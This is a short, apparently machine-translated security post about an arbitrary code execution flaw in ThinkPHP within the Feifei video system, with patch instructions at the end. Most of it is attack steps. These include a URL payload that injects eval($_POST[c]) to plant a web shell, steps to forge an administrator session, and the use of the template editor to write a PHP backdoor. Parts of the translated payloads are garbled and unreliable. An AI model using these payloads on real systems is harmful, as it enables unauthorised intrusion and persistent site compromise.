Use and fix Arbitrary Code Execution Vulnerability of Feifei video system 2.0.120220 (Beta4) version of thinkphp

The first method is executed directly.
A http://www.2cto.com/index. php? S = vod-search-area-$ {@ print (eval ($ _ POST [c])}. html
Connect directly with a kitchen knife.

 

 

Method 2: (this is troublesome) execute the following three steps to construct a SESSION, log on to the background directly, and execute the following three steps in sequence.
Enter in the address bar
Index. php? S=vod-search-area-00000000@$_session?adminlogin=00001).html

Index. php? S=vod-search-area-00000000@$_session0000c(user_auth_key000000000000000010000.html

Index. php? Bytes

Log on to the background after the execution is completed.
Enter the address bar
Index. php? S = admin-index
Index. php? S = Admin-Index-Top

Index. php? S = Admin-Index-Top

S = Admin-Tpl-Show
/Index. php? S = Admin-Cache-Show
/Index. php? S = Admin-Tpl-Show-id-. | Tpl | default

Take shell and template management, click a template at will, click Edit, enter the path, and change the name to xx. php to write a sentence.

Solution: This URL security vulnerability can cause users to forge URLs on the client and execute illegal code.

Affected Versions include 2.1, 2.2, and 3.0. Update the core program in a timely manner.

: Http://thinkphp.cn/download-116.html

Correction Method:

First, extract the security patch file.
Versions 2.1 and 2.2
Replace the Dispatcher. class. php file in the patch package with the same name in the ThinkPHP/Lib/Think/Util/directory.

Version 3.0
Replace the Dispatcher. class. php file in the patch package with the same name in the ThinkPHP/Lib/Core/directory.
Replace the CheckRouteBehavior. class. php file in the patch package with the same name in the ThinkPHP/Lib/Behavior/directory.